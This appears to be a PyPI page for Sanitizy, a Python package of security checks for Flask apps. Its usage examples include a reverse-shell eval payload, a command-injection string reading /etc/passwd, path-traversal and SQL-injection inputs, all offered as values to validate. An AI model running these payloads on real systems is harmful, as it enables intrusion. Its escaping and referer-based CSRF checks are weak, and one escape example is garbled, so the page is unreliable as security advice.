Helpful module to secure flask apps
Project description
Sanitizy
This is a simple and very light weight python package to help securing python web applications in general especially Flask apps since they lack security !!
Usage:
XSS:
Escape some value:
from sanitizy import *
XSS.escape('<h1>')# produces: '<h1>'
Escape all Flask's paramaters GET:
XSS.escape_args(request)#produces a dict with escaped values
Escape all Flask's paramaters POST:
XSS.escape_form(request)#produces a dict with escaped values
SQL-Injection:
Escape some value:
from sanitizy import *
SQLI.escape("' or 1=1 or '")# produces: "\' or 1=1 or \'"
Escape all Flask's paramaters GET:
SQLI.escape_args(request)#produces a dict with escaped values
Escape all Flask's paramaters POST:
SQLI.escape_form(request)#produces a dict with escaped values
CSRF:
Check if the request is coming from the application itself or not:
CSRF.validate("http://www.google.com",["www.google.com","www.bing.com"])#takes the referer header value and a list of allowed domains, then returns 'True' if it's safe and 'False' if not
Check if the request is coming from the Falsk application itself or not:
CSRF.validate_flask(request)#returns 'True' if it's safe and 'False' if not
SSRF:
Validate if the url can lead to a SSRF:
SSRF.validate("http://localhost:22")#returns 'True' if it's safe and 'False' if not
Validate if the Domain/IP can lead to a SSRF:
SSRF.validate("localhost:22",url=False)#returns 'True' if it's safe and 'False' if not
File Upload:
Check if the file is safe or not:
FILE_UPLOAD.check_file(request.files['file'],allowed_extensions=['png','jpg','jpeg','gif','pdf'],allowed_mimetypes=["application/pdf","application/x-pdf","image/png","image/jpg","image/jpeg"])#returns 'True' if it's safe and 'False' if not
Save files securely:
FILE_UPLOAD.save_file(request.files['file'],path="uploads/")#it will returns the path to the uploaded file
Path Traversal:
Check if the file is safe to open/download or not:
PATH_TRAVERSAL.check("../../../../../../etc/passwd")#returns 'True' if it's safe and 'False' if not
RCE (Remote Code/Command Execution):
Check value is safe to pass to a command or not:
RCE.command("ls -a ;cat /etc/passwd ")#returns 'True' if it's safe and 'False' if not
Check value is safe to pass to an "eval" function or not:
RCE.eval("__import__('os').system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")#returns 'True' if it's safe and 'False' if not
Validate User Inputs:
Check value contains alphabets only:
FORM_INPUTS.alphabet("ala bouali",length=(1,50))#returns 'True' if it's correct and 'False' if not
Check if value contains numbers only:
FORM_INPUTS.numeric("233 21 4",length=(1,15))#returns 'True' if it's correct and 'False' if not
Check if value contains alphabets only:
FORM_INPUTS.alphabet("ala bouali",length=(1,50))#returns 'True' if it's correct and 'False' if not
Check if value is alphanumeric:
FORM_INPUTS.alphanumeric(" ala bOuali12 56",length=(1,50))#returns 'True' if it's correct and 'False' if not
Check if value is an Email:
FORM_INPUTS.email("alabouali@gmail.com",length=(6,15))#returns 'True' if it's correct and 'False' if not
Check if value is a Phone Number:
FORM_INPUTS.phone_number("+123456789",length=(6,15))#returns 'True' if it's correct and 'False' if not
Check if value is a long enough Password:
FORM_INPUTS.password("fvccabah$vhj",length=(8,15))#returns 'True' if it's correct and 'False' if not
Check if 2 Passwords match and if they are long enough:
FORM_INPUTS.passwords_match("fvccabah$vhj","fvccabah$234",length=(8,15))#returns 'True' if it's correct and 'False' if not
Check if value matches a specific Regex:
FORM_INPUTS.regex_match("alabouali@gmail.com",r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b',length=(6,15))#returns 'True' if it's correct and 'False' if not
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
sanitizy-1.1.4.tar.gz
(4.8 kB
view hashes)